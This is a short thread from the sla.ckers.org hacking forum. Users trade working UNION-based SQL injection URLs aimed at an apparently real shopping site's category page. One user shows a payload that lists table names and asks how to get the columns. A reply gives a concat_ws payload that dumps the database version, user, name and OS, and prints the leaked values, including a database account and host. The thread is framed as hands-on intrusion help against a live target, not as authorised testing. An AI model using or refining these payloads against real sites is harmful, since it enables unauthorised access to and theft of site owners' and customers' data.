Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
can see table name but not the column...
Posted by: kenjii
Date: November 25, 2013 09:30AM

hi all

here is my problem
http://allwaysus.com/category.php?id=17 UNION SELECT 1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--


i can see the tables name but when i try to get the columns i just got nothing....

Options: ReplyQuote
Re: can see table name but not the column...
Posted by: ajkaro
Date: November 28, 2013 11:43AM

use lowercase table names :)

Options: ReplyQuote
Re: can see table name but not the column...
Posted by: seeki
Date: November 28, 2013 11:48PM

With concat_ws function queries can get

http://allwaysus.com/category.php?id=17 UNION SELECT 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4+from+information_schema.tables+where+table_schema=database()--

log::yacrostore@spruce.dreamhost.com::store_2013::pc-linux-gnu

by china ieasyi

Options: ReplyQuote
Re: can see table name but not the column...
Posted by: kenjii
Date: November 29, 2013 01:13PM

thank i have found with the lowercase it was my bad :(


can you give me more info about concat_ws ?

Options: ReplyQuote


Sorry, only registered users may post in this forum.